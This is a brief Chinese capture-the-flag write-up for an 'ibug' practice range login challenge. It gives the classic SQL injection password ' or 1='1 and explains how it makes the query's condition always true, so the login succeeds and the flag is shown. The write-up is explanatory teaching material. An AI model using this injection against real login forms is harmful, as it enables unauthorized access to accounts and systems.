ibug靶场(万能密码登陆)
2019-02-17 本文已影响0人
1f28dd1475ee
题目很明显的标注,万能密码登陆
用户名随便输
密码: ' or 1 ='1
登陆拿到flag
select name,pass from tbAdmin where name='admin' and pass='123456'
输入密码: ' or 1='1
sql语句就变成下面这个样子:
select name,pass from tbAdmin where name='admin' and pass='' or 1='1'
1='1'永远为真,所以登陆成功